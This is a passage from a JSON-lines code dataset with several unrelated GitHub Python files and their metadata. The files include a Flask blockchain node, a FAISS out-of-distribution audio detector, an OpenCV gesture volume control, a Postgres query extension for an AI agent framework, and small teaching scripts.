self._noaa_current_obs[\"weather\"]\n\n def temp_str(self):\n \"\"\"\n Returns the temperature with decimal point dropped\n \"\"\"\n\n try:\n temp = \"%iF\" % int(float(self._noaa_current_obs[\"temp_f\"]))\n except:\n temp = \"\"\n\n return temp\n", "repo_name": "mattgrogan/ledmatrix", "sub_path": "ledmatrix/data/mappers/current_obs.py", "file_name": "current_obs.py", "file_ext": "py", "file_size_in_byte": 812, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "data.utils.indicator_mapper.Indicator_Data_Map", "line_number": 6, "usage_type": "name"}, {"api_name": "data.current_conditions.NOAA_Current_Observation", "line_number": 11, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 17, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "29253380165", "text": "import os\nimport random\nimport requests\n\nfrom flask import Flask, jsonify, request\n\nfrom backend.blockchain.blockchain import Blockchain\nfrom backend.pubsub import PubSub\nfrom backend.wallet.wallet import Wallet\nfrom backend.wallet.transaction import Transaction\nfrom backend.wallet.transaction_pool import TransactionPool\n\napp = Flask(__name__)\n\nblockchain = Blockchain()\nwallet = Wallet(blockchain)\ntransaction_pool = TransactionPool()\npubsub = PubSub(blockchain, transaction_pool)\n\n\n@app.route(\"/\")\ndef route_default():\n return \"Welcom to the Blockchain\"\n\n\n@app.route(\"/blockchain/\")\ndef route_blockchain():\n return jsonify(blockchain.to_json())\n\n\n@app.route(\"/blockchain/mine/\")\ndef route_blockchain_mine():\n blockchain.add_block(transaction_pool.transaction_data())\n block = blockchain.chain[-1]\n\n pubsub.brodcast_block(block)\n\n transaction_pool.clear_blockchain_transactions(blockchain)\n\n return jsonify(block.to_json())\n\n\n@app.route(\"/wallet/transact/\", methods=['POST'])\ndef route_wallet_transact():\n transaction_data = request.get_json()\n transaction = transaction_pool.existing_transaction(wallet.address)\n if transaction:\n transaction.update(\n wallet,\n transaction_data['recipient'],\n transaction_data['amount'],\n )\n else:\n transaction = Transaction(\n wallet,\n transaction_data['recipient'],\n transaction_data['amount'],\n )\n\n # print(f'transaction.to_json(): {transaction.to_json()}')\n pubsub.brodcast_transaction(transaction)\n\n return jsonify(transaction.to_json())\n\n\n@app.route(\"/wallet/info/\")\ndef route_wallet_info():\n return jsonify(\n {'address': wallet.address, 'balance': wallet.balance}\n )\n\n\nROOT_PORT = 8000\nPORT = ROOT_PORT\n\nif os.environ.get(\"PEER\") == \"True\":\n\n PORT = random.randint(5000, 7000)\n result = requests.get(f\"http://localhost:{ROOT_PORT}/blockchain/\")\n print(f\"Result in json: {result.json()}\")\n\n result_blockchain = Blockchain.from_json(result.json())\n try:\n blockchain.replace_chain(result_blockchain.chain)\n print(\"-- Successfully syncronized the local chain\")\n except Exception as e:\n print(f\"\\n -- Error syncronizing: {e}\")\n\napp.run(port=PORT, debug=False)\n", "repo_name": "amitgit712/python-blockchain", "sub_path": "backend/app/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 2286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "backend.blockchain.blockchain.Blockchain", "line_number": 15, "usage_type": "call"}, {"api_name": "backend.wallet.wallet.Wallet", "line_number": 16, "usage_type": "call"}, {"api_name": "backend.wallet.transaction_pool.TransactionPool", "line_number": 17, "usage_type": "call"}, {"api_name": "backend.pubsub.PubSub", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 28, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "backend.wallet.transaction.Transaction", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 63, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 68, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 76, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 76, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 78, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 79, "usage_type": "call"}, {"api_name": "backend.blockchain.blockchain.Blockchain.from_json", "line_number": 82, "usage_type": "call"}, {"api_name": "backend.blockchain.blockchain.Blockchain", "line_number": 82, "usage_type": "name"}]} +{"seq_id": "22935573536", "text": "#!/usr/bin/env python\n#\n# Author: Daniela Duricekova \n#\n\nimport multiprocessing\n\n\nNUMS = list(range(25, 33))\n\n\ndef fib(n):\n if n <= 1:\n return 1\n else:\n return fib(n - 1) + fib(n - 2)\n\n\ndef n_fib(n, results):\n results.put((n, fib(n)))\n\n\nif __name__ == '__main__':\n results = multiprocessing.Queue()\n processes = []\n for n in NUMS:\n p = multiprocessing.Process(target=n_fib, args=(n, results))\n processes.append(p)\n p.start()\n\n for p in processes:\n p.join()\n\n for _ in range(len(NUMS)):\n print(results.get())\n", "repo_name": "sopticek/blog", "sub_path": "2017-05-13-concurrent-and-parallel-programming-in-python-part-1/multiprocessing_no_inheritance.py", "file_name": "multiprocessing_no_inheritance.py", "file_ext": "py", "file_size_in_byte": 613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "53", "api": [{"api_name": "multiprocessing.Queue", "line_number": 24, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "10089626488", "text": "import os\r\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\r\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\nimport argparse\r\nimport numpy as np\r\n# See installation guide for FAISS here: https://github.com/facebookresearch/faiss/blob/main/INSTALL.md\r\nimport faiss\r\nimport metrics\r\n\r\nparser = argparse.ArgumentParser(description=\"OOD Detection for Audio\")\r\n\r\nparser.add_argument(\"--ind_dataset\", \r\n default=\"mswc_en\", type=str,\r\n help=\"in-distribution dataset name\")\r\n\r\nparser.add_argument(\"--ood_dataset\", \r\n default=\"vocalsound\", type=str,\r\n help=\"out-of-distribution dataset name\")\r\n\r\nparser.add_argument(\"--models_dir\", \r\n default=\"./models/\", type=str,\r\n help=\"models directory path\")\r\n\r\nparser.add_argument(\"--features_dir\", \r\n default=\"./features/\", type=str, \r\n help=\"features directory path\")\r\n\r\nparser.add_argument(\"--k\", \r\n default=5, type=int, \r\n help=\"number of nearest neighbors for ood\")\r\n\r\nargs = parser.parse_args()\r\n\r\ndef run_deep_knn_ood(args):\r\n features_path = os.path.join(args.features_dir,\r\n f\"{args.ind_dataset}_yamnet\")\r\n \r\n tr_ind_feat = np.load(os.path.join(features_path, \r\n \"ind_train_features.npy\"))\r\n ts_ind_feat = np.load(os.path.join(features_path, \r\n \"ind_test_features.npy\"))\r\n ts_ood_feat = np.load(os.path.join(features_path, \r\n f\"{args.ood_dataset}_ood_test_features.npy\")) \r\n\r\n normalizer = lambda x: x / (np.linalg.norm(x, \r\n ord=2, axis=-1, keepdims=True) + 1e-10)\r\n tr_ind_feat = normalizer(tr_ind_feat) \r\n ts_ind_feat = normalizer(ts_ind_feat)\r\n ts_ood_feat = normalizer(ts_ood_feat)\r\n\r\n index = faiss.IndexFlatL2(tr_ind_feat.shape[1])\r\n index.add(tr_ind_feat)\r\n ind_D, _ = index.search(ts_ind_feat, args.k)\r\n ind_scores = -ind_D[:,-1]\r\n ood_D, _ = index.search(ts_ood_feat, args.k)\r\n ood_scores = -ood_D[:,-1]\r\n\r\n results = metrics.get_measures(\r\n ind_scores, ood_scores, \r\n recall_level = 0.95)\r\n fpr95 = results[\"FPR\"]\r\n auroc = results[\"AUROC\"]\r\n print(f\"FPR95: {fpr95} | AUROC: {auroc}\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n run_deep_knn_ood(args)", "repo_name": "Zaharah/ood_audio", "sub_path": "run_ood.py", "file_name": "run_ood.py", "file_ext": "py", "file_size_in_byte": 2123, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 45, "usage_type": "attribute"}, {"api_name": "faiss.IndexFlatL2", "line_number": 51, "usage_type": "call"}, {"api_name": "metrics.get_measures", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "71664090729", "text": "import cv2\nimport mediapipe as mp\nimport time\nimport numpy as np\nimport hand_tracker as ht\n\n\nfrom ctypes import cast, POINTER\nfrom comtypes import CLSCTX_ALL\nfrom pycaw.pycaw import AudioUtilities, IAudioEndpointVolume\ndevices = AudioUtilities.GetSpeakers()\ninterface = devices.Activate(\n IAudioEndpointVolume._iid_, CLSCTX_ALL, None)\nvolume = cast(interface, POINTER(IAudioEndpointVolume))\n\nvolume.GetVolumeRange()\nvolRnge = volume.GetVolumeRange()\nmaxvol =volRnge[1]\nminvol = volRnge[0]\n\ncap = cv2.VideoCapture(0)\nprint(minvol)\nptime = 0\nvolbar = -65.25\ndetector = ht.hand_detector(detection_confidence=0.75)\nwhile True:\n success, img = cap.read()\n img = cv2.flip(img,1)\n ctime = time.time()\n fps = 1/(ctime - ptime)\n ptime = ctime\n cv2.putText(img,f\"FPS : {int(fps)}\",(10,80),cv2.FONT_HERSHEY_COMPLEX,1,(0,0,0),2)\n detector.hand_detection(img)\n lmlis = detector.findposition(img,draw = False)\n if len(lmlis) != 0:\n\n x , y = lmlis[4][1] , lmlis[4][2]\n x1 , y1 = lmlis[8][1], lmlis[8][2]\n cx, cy = (x+x1)//2,(y+y1)//2\n length = np.hypot(x1 - x,y1-y)\n vol = np.interp(length,[30,110],[minvol,maxvol])\n volbar = np.interp(vol,[minvol,maxvol],[400,150])\n volper = np.interp(vol,[minvol,maxvol],[0,100])\n volume.SetMasterVolumeLevel(vol, None)\n\n cv2.circle(img,(x , y),8,(0,255,0),-1)\n cv2.circle(img,(x1 , y1),8,(0,255,0),-1)\n cv2.circle(img,(cx , cy),8,(0,255,0),-1)\n \n cv2.line(img,(x,y),(x1,y1),(0,255,0),2)\n cv2.rectangle(img,(150,150),(85,400),(0,125,0))\n cv2.rectangle(img,(150,int(volbar)),(85,400),(0,125,0),-1)\n cv2.putText(img,f\"{int(volper)}%\",(30,150),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,0,255),1)\n\n if length < 35:\n cv2.circle(img,(cx , cy),8,(0,0,255),-1)\n\n \n\n\n\n\n\n\n\n\n cv2.imshow(\"Image\",img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n \n\n ", "repo_name": "Joelthomas62384/ai-computer-vision", "sub_path": "gesture_volume.py", "file_name": "gesture_volume.py", "file_ext": "py", "file_size_in_byte": 1937, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pycaw.pycaw.AudioUtilities.GetSpeakers", "line_number": 11, "usage_type": "call"}, {"api_name": "pycaw.pycaw.AudioUtilities", "line_number": 11, "usage_type": "name"}, {"api_name": "comtypes.CLSCTX_ALL", "line_number": 13, "usage_type": "argument"}, {"api_name": "pycaw.pycaw.IAudioEndpointVolume._iid_", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pycaw.pycaw.IAudioEndpointVolume", "line_number": 13, "usage_type": "name"}, {"api_name": "ctypes.cast", "line_number": 14, "usage_type": "call"}, {"api_name": "ctypes.POINTER", "line_number": 14, "usage_type": "call"}, {"api_name": "pycaw.pycaw.IAudioEndpointVolume", "line_number": 14, "usage_type": "argument"}, {"api_name": "cv2.VideoCapture", "line_number": 21, "usage_type": "call"}, {"api_name": "hand_tracker.hand_detector", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.hypot", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 51, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 53, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 68, "usage_type": "call"}]} +{"seq_id": "41521044463", "text": "import requests\nimport sys\ndef test(url_test):\n payload={'page':'1','count':'2'}\n urltest=url_test\n req=requests.post(urltest,data=payload, verify=False)\n print(req.url)\n print(type(req.text))\n\n print(type(req.json()))\n\n print(req.headers)\n\nurlname=sys.argv[1]\n\ntest(urlname)\n# test_url=\"https://api.github.com/repos/clairyin/homework/contents\"\n# win_url=\"J:/xew1.txt\"\n# with open(win_url, 'rb') as f:\n# print(f.readlines())\n# def get_git():\n#\n# req=requests.get(test_url)\n# #print(req.text)\n# print(req.json())\n#\n# file = open(win_url, 'rb')\n# files = {'file': file}\n# requests.post(test_url,)\n# get_git()", "repo_name": "clairyin/homework", "sub_path": "yaoxuechuan/homework01.py", "file_name": "homework01.py", "file_ext": "py", "file_size_in_byte": 658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.post", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "18754616760", "text": "#!/opt/python-2.7/bin/python2.7\n#\n# script can be run without invoking python because of shebang\n# will be run with correct version on Patas\n#\n# Code last updated on 5/26/2014 by Claire Jaja\n#\n# This script will convert documents from the AQUAINT2 format\n# to the AQUAINT format.\n\nimport sys\nfrom bs4 import BeautifulSoup\nfrom os import listdir, path, makedirs\n\ndef main():\n # argument is folder to put converted corpus\n converted_data = sys.argv[1]\n AQUAINT2 = \"/corpora/LDC/LDC08T25/data/\"\n\n # for every folder in AQUAINT2/data\n for folder in listdir(AQUAINT2):\n sys.stderr.write(\"Folder: \"+folder+\"\\n\")\n # create same folder in converted_data folder\n new_folder = path.join(converted_data,folder)\n if not path.exists(new_folder):\n makedirs(new_folder)\n # for every .xml file in that folder\n for file in [ x for x in listdir(path.join(AQUAINT2,folder)) if x.endswith(\".xml\") ]:\n sys.stderr.write(\"File: \"+file+\"\\n\")\n # create file with same name in newly created folder\n new_file = open(path.join(new_folder,file),'w')\n # parse xml with beautiful soup\n xml = open(path.join(AQUAINT2,folder,file),'r')\n soup = BeautifulSoup(xml)\n # gather doc ID, headline, and text\n docs = soup.find_all(\"doc\")\n doc_ids = []\n headlines = []\n text = []\n for doc in docs:\n doc_ids.append(doc['id'])\n if doc.headline:\n headlines.append(doc.headline.get_text())\n else:\n headlines.append(\"None\")\n text.append(doc.text)\n xml.close()\n # print out doc ID, headline, and text to newly created file\n for i in range(len(doc_ids)):\n new_file.write(\"\\n\")\n new_file.write(\" %s \\n\" % doc_ids[i])\n new_file.write(\"\\n\")\n if headlines[i]:\n new_file.write(\" %s \\n\" % headlines[i].encode('utf8'))\n new_file.write(\" %s \\n\" % text[i].encode('utf8'))\n new_file.write(\"\\n\")\n new_file.write(\"\\n\")\n new_file.close()\n\n\nif __name__ == '__main__':\n\tmain()\n", "repo_name": "amkahn/question-answering", "sub_path": "src/convert_AQUAINT2_to_AQUAINT_format.py", "file_name": "convert_AQUAINT2_to_AQUAINT_format.py", "file_ext": "py", "file_size_in_byte": 2351, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 26, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "name"}, {"api_name": "sys.stderr.write", "line_number": 29, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "2810922203", "text": "import logging\n\ntry:\n import psycopg2\nexcept ImportError:\n import sys\n import subprocess\n\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"psycopg2\"])\n import psycopg2\n\nimport psycopg2.extras\nimport logging\nfrom Extensions import Extensions\n\n\nclass postgres_database(Extensions):\n def __init__(\n self,\n POSTGRES_DATABASE_NAME: str = \"\",\n POSTGRES_DATABASE_HOST: str = \"\",\n POSTGRES_DATABASE_PORT: int = 5432,\n POSTGRES_DATABASE_USERNAME: str = \"\",\n POSTGRES_DATABASE_PASSWORD: str = \"\",\n **kwargs,\n ):\n self.agent_name = kwargs[\"agent_name\"] if \"agent_name\" in kwargs else \"gpt4free\"\n self.ApiClient = kwargs[\"ApiClient\"] if \"ApiClient\" in kwargs else None\n self.POSTGRES_DATABASE_NAME = POSTGRES_DATABASE_NAME\n self.POSTGRES_DATABASE_HOST = POSTGRES_DATABASE_HOST\n self.POSTGRES_DATABASE_PORT = POSTGRES_DATABASE_PORT\n self.POSTGRES_DATABASE_USERNAME = POSTGRES_DATABASE_USERNAME\n self.POSTGRES_DATABASE_PASSWORD = POSTGRES_DATABASE_PASSWORD\n self.commands = {\n \"Custom SQL Query in Postgres Database\": self.execute_sql,\n \"Get Database Schema from Postgres Database\": self.get_schema,\n }\n\n def get_connection(self):\n try:\n connection = psycopg2.connect(\n database=self.POSTGRES_DATABASE_NAME,\n host=self.POSTGRES_DATABASE_HOST,\n port=self.POSTGRES_DATABASE_PORT,\n user=self.POSTGRES_DATABASE_USERNAME,\n password=self.POSTGRES_DATABASE_PASSWORD,\n )\n return connection\n except Exception as e:\n logging.error(f\"Error connecting to Postgres Database. Error: {str(e)}\")\n return None\n\n async def execute_sql(self, query: str):\n if \"```sql\" in query:\n query = query.split(\"```sql\")[1].split(\"```\")[0]\n query = query.replace(\"\\n\", \" \")\n query = query.strip()\n logging.info(f\"Executing SQL Query: {query}\")\n connection = self.get_connection()\n cursor = connection.cursor(cursor_factory=psycopg2.extras.DictCursor)\n try:\n cursor.execute(query)\n rows = cursor.fetchall()\n cursor.close()\n connection.close()\n rows_string = \"\"\n # If there is only 1 row and 1 column, return the value as a string\n if len(rows) == 1 and len(rows[0]) == 1:\n return str(rows[0][0])\n # If there is more than 1 column and at least 1 row, return it as a CSV format\n if len(rows) >= 1 and len(rows[0]) > 1:\n # If there is more than 1 column and at least 1 row, return it as a CSV format, build column heading, and make sure each row value is quoted\n column_headings = []\n for column in cursor.description:\n column_headings.append(column.name)\n rows_string += \",\".join(column_headings) + \"\\n\"\n for row in rows:\n row_string = []\n for value in row:\n row_string.append(f'\"{value}\"')\n rows_string += \",\".join(row_string) + \"\\n\"\n return rows_string\n # If there is only 1 column and more than 1 row, return it as a CSV format\n if len(rows) > 1 and len(rows[0]) == 1:\n for row in rows:\n rows_string += f'\"{row[0]}\"\\n'\n return rows_string\n return rows_string\n except Exception as e:\n logging.error(f\"Error executing SQL Query: {str(e)}\")\n # Reformat the query if it is invalid.\n new_query = self.ApiClient.prompt_agent(\n agent_name=self.agent_name,\n prompt_name=\"Validate PostgreSQL\",\n prompt_args={\n \"database_type\": \"PostgreSQL\",\n \"schema\": await self.get_schema(),\n \"query\": query,\n },\n )\n return await self.execute_sql(query=new_query)\n\n async def get_schema(self):\n logging.info(f\"Getting schema for database '{self.POSTGRES_DATABASE_NAME}'\")\n connection = self.get_connection()\n cursor = connection.cursor(cursor_factory=psycopg2.extras.DictCursor)\n cursor.execute(\n f\"SELECT schema_name FROM information_schema.schemata WHERE schema_name NOT IN ('pg_catalog', 'information_schema');\"\n )\n schemas = cursor.fetchall()\n sql_export = []\n key_relations = []\n for schema in schemas:\n schema_name = schema[\"schema_name\"]\n cursor.execute(\n f\"\"\"\n SELECT kcu.table_name as foreign_table, rel_tco.table_name as primary_table,\n kcu.column_name as foreign_column, rel_kcu.column_name as primary_column\n FROM information_schema.table_constraints tco\n JOIN information_schema.key_column_usage kcu \n ON kcu.constraint_name = tco.constraint_name\n AND kcu.constraint_schema = tco.constraint_schema\n JOIN information_schema.referential_constraints rco ON tco.constraint_name = rco.constraint_name\n AND tco.constraint_schema = rco.constraint_schema\n JOIN information_schema.key_column_usage rel_kcu ON rco.unique_constraint_name = rel_kcu.constraint_name\n AND rco.unique_constraint_schema = rel_kcu.constraint_schema\n JOIN information_schema.table_constraints rel_tco ON rel_kcu.constraint_name = rel_tco.constraint_name\n AND rel_kcu.constraint_schema = rel_tco.constraint_schema\n WHERE tco.constraint_type = 'FOREIGN KEY' AND tco.table_schema = '{schema_name}' \n \"\"\"\n )\n relations = cursor.fetchall()\n if relations:\n for relation in relations:\n key_relations.append(\n f\"-- {relation['foreign_table']}.{relation['foreign_column']} can be joined with \"\n f\"{relation['primary_table']}.{relation['primary_column']}\"\n )\n\n cursor.execute(\n f\"\"\"\n SELECT table_name, column_name, data_type, column_default, is_nullable, ordinal_position \n FROM information_schema.columns \n WHERE table_schema = '{schema_name}';\n \"\"\"\n )\n rows = cursor.fetchall()\n\n table_columns = {}\n for row in rows:\n table_name = row[\"table_name\"]\n if table_name not in table_columns:\n table_columns[table_name] = []\n column_details = {\n \"column_name\": row[\"column_name\"],\n \"data_type\": row[\"data_type\"],\n \"column_default\": row[\"column_default\"],\n \"is_nullable\": row[\"is_nullable\"],\n }\n table_columns[table_name].append(column_details)\n\n for table_name, columns in table_columns.items():\n create_table_sql = f\"CREATE TABLE {schema_name}.{table_name} (\"\n for column in columns:\n column_sql = f\"{column['column_name']} {column['data_type']}\"\n if column[\"column_default\"]:\n column_sql += f\" DEFAULT {column['column_default']}\"\n if column[\"is_nullable\"] == \"NO\":\n column_sql += \" NOT NULL\"\n create_table_sql += f\"{column_sql}, \"\n create_table_sql = create_table_sql.rstrip(\", \") + \");\"\n sql_export.append(create_table_sql)\n connection.close()\n return \"\\n\\n\".join(sql_export + key_relations)\n", "repo_name": "Josh-XT/AGiXT", "sub_path": "agixt/extensions/postgres_database.py", "file_name": "postgres_database.py", "file_ext": "py", "file_size_in_byte": 8038, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2174, "dataset": "github-code", "pt": "53", "api": [{"api_name": "subprocess.check_call", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 9, "usage_type": "attribute"}, {"api_name": "Extensions.Extensions", "line_number": 17, "usage_type": "name"}, {"api_name": "psycopg2.connect", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "psycopg2.extras", "line_number": 60, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 90, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 104, "usage_type": "call"}, {"api_name": "psycopg2.extras", "line_number": 106, "usage_type": "attribute"}]} +{"seq_id": "3673933445", "text": "from typing import NamedTuple\n\nclass MyTuple(NamedTuple):\n id: int\n name: str\n\nt1 = MyTuple(1, \"A\")\nt2 = MyTuple(*(2, \"B\"))\nt3 = MyTuple(**{\n \"id\": 3,\n \"name\": \"C\"})\nt4 = MyTuple._make([4, \"D\"])\n\nprint(t1)\nprint(t2)\nprint(t3)\nprint(t4)", "repo_name": "robobe/robobe.github.io", "sub_path": "examples/python/ds/named_tuple/hello.py", "file_name": "hello.py", "file_ext": "py", "file_size_in_byte": 247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.NamedTuple", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "3930685816", "text": "import nltk\n\n#importing stop words library (or not library !)\n\nnltk.download('stopwords')\n\nfrom nltk.corpus import stopwords\n\nfrom nltk import word_tokenize\n\n#langues reconnues par python stopwords\n\nlanguage = ['turkish', 'tajik', 'swedish', 'spanish', 'slovene', 'russian', 'romanian', 'portuguese', 'norwegian', 'nepali', 'kazakh', 'italian', 'indonesian', 'hungarian', 'greek', 'german', 'french', 'finnish', 'english', 'dutch', 'danish', 'azerbaijani', 'arabic']\npotentiel = []\nreconnu = []\ndico = {}\ndef reclangue() :\n text = str(input('type here '))\n tokenizedtxt = word_tokenize(text)\n for lang in language : \n stpwrs = (stopwords.words(lang))\n for word in tokenizedtxt : \n if word in stpwrs : \n potentiel.append(lang)\n for lng in potentiel : \n if lng not in reconnu :\n reconnu.append(lng)\n \n for lng in reconnu : \n cal = potentiel.count(lng)\n dico[lng] = cal\n dict(sorted(dico.items(), key=lambda item: item[1]))\n \n return print(max(dico, key=dico.get)) \n\nreclangue()\n", "repo_name": "MohdSarar/Language-Recognition-NLTK", "sub_path": "lang_reco.py", "file_name": "lang_reco.py", "file_ext": "py", "file_size_in_byte": 1083, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nltk.download", "line_number": 5, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 19, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 21, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "1167423623", "text": "\"\"\"\nMy Camera Application\nouthor : Sa'ad\n\n\"\"\"\n\nimport sys\n\nimport cv2\nfrom PyQt5.QtCore import QTimer\nfrom PyQt5.QtGui import QIcon, QImage, QPixmap\nfrom PyQt5.QtWidgets import *\n\n\nclass Window(QWidget) :\n # My Camera Application\n\n def __init__(self) :\n super().__init__() \n\n # variables for app window\n self.window_width = 640\n self.window_height = 400\n\n # image variables\n self.img_width = 640\n self.img_height = 400\n\n # setup the window\n self.setWindowTitle(\"My Camera App\")\n self.setGeometry(100, 100, self.window_width, self.window_height)\n self.setFixedSize(self.window_width, self.window_height)\n\n self.camera_icon = QIcon(cap_icon_path)\n\n # setup timer\n self.timer = QTimer()\n self.timer.timeout.connect(self.update)\n\n self.ui()\n\n def ui(self) :\n # contains all UI things\n # layout\n grid = QGridLayout()\n self.setLayout(grid)\n\n # image label\n self.image_label = QLabel(self)\n self.image_label.setGeometry(0, 0, self.img_width, self.img_height)\n\n # capture btn\n self.capture_btn = QPushButton(self)\n self.capture_btn.setIcon(self.camera_icon)\n self.capture_btn.setStyleSheet(\"border-radius: 30; border : 2px solid black; border-width : 3px\")\n self.capture_btn.setFixedSize(50, 50)\n self.capture_btn.clicked.connect(self.save_image)\n\n if not self.timer.isActive() :\n self.cap = cv2.VideoCapture(0)\n self.timer.start(20)\n\n grid.addWidget(self.capture_btn, 0, 0)\n grid.addWidget(self.image_label, 0 , 1)\n \n self.show()\n\n def update(self) :\n # update frames\n _, self.frame = self.cap.read()\n frame = cv2.cvtColor(self.frame, cv2.COLOR_BGR2RGB)\n height, width, channel = frame.shape\n step = channel * width\n\n q_frame = QImage(frame.data, width, height, step, QImage.Format_RGB888)\n self.image_label.setPixmap(QPixmap.fromImage(q_frame))\n\n def save_image(self) :\n # save image from camera\n print(\"saving image\")\n cv2.imwrite(\"my_img.jpg\", self.frame)\n\n def record(self) :\n # record video\n pass\n\n\ncap_icon_path = \"assets/icons/capture.png\"\n\n# run \napp = 